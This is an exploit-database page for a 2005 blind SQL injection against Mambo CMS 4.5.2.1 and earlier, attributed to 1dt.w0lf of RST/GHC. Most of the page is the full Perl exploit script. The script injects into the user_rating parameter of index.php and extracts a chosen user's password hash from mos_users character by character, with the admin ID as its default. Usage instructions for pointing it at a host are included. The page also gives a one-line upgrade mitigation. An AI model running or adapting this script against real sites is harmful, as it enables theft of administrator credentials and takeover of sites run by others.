header-logo
Suggest Exploit
vendor:
Mambo CMS
by:
1dt.w0lf
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mambo CMS
Affected Version From: Mambo <= 4.5.2.1, MySQL => 4.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit

This exploit targets the Mambo CMS versions 4.5.2.1 and below, as well as MySQL version 4.1. It allows an attacker to perform SQL injection by manipulating the user_rating parameter in the index.php file. By exploiting this vulnerability, an attacker can retrieve the password of a user with a specific ID.

Mitigation:

Upgrade to a secure version of Mambo CMS and MySQL.
Source

Exploit-DB raw data:

#!/usr/bin/perl

### Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf , 21.06.05
### http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


use IO::Socket;

if (@ARGV < 3) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];

$news_id = 1;
$news_itemid = 1;

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~]  SERVER : $server\r\n";
print " [~]    PATH : $path\r\n";
print " [~] USER ID : $member_id\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); } 
$char = $i;
if ($char=="0") 
 { 
 if(length($allchar) > 0){
 print qq{\b\b DONE ] 
 ---------------------------------------------------------------
 USER ID : $member_id
    HASH : $allchar
 ---------------------------------------------------------------
 };
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();  
 }
else 
 {  
 $allchar .= chr($char); 
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0]; 
 $sock1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
 printf $sock1 ("GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
 $path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server); 
 sleep 1; 
 $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
 printf $sock2 ("GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1 HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
 $path,$news_id,$news_itemid,$server);

 while(<$sock2>) 
  {   
  if (/1145711457/) { return 1; }
  } 

 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 &head;
 print q(
 USAGE
    r57mambo.pl [HOST] [/FOLDER/] [USER_ID]
  
 OPTIONS
    HOST    - Host where mambo installed
    FOLDER  - Folder where mambo installed
    USER_ID - User ID for brute (default is 62 for admin)
  
 E.G.
    r57mambo.pl http://blah.com /mambo/ 62
 ---------------------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }
sub head()
 {
 print q(
 ---------------------------------------------------------------
 Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC
 ---------------------------------------------------------------
 );
 }

# milw0rm.com [2005-06-21]

Navigation

Suggest Exploit

Services By CQR